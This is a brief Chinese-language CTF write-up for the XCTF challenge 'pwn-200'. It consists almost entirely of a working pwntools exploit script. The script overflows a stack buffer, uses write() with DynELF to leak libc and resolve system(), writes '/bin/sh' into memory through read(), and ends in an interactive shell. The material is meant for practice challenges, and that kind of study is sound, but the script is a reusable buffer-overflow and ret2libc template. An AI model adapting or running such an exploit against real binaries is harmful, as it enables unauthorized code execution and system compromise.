XCTF PWN高手进阶区之pwn-200

此题,setbuf未发现有什么作用!
exp:

from pwn import *

sub_addr=0x8048484
def leak(addr):
payload=‘a’*112+p32(write_plt)+p32(sub_addr)+p32(1)+p32(addr)+p32(4)
p.sendline(payload)
return p.recv()[:4]

p=process("./pwn-200")
print p.recv()
elf=ELF("./pwn-200")
write_plt=elf.sym[‘write’]
write_got=elf.got[‘write’]
read_plt=elf.sym[‘read’]
pop3_ret=0x0804856c

d=DynELF(leak,elf=elf)
system_addr=d.lookup(‘system’,‘libc’)
bin_sh_addr=0x0804b000-8
payload=‘a’*112+p32(read_plt)+p32(pop3_ret)+p32(0x0)+p32(bin_sh_addr)+p32(0x8)+p32(system_addr)+p32(0x0)+p32(bin_sh_addr)
p.sendline(payload)
p.sendline(’/bin/sh’)
p.interactive()

你可能感兴趣的:(Pwn)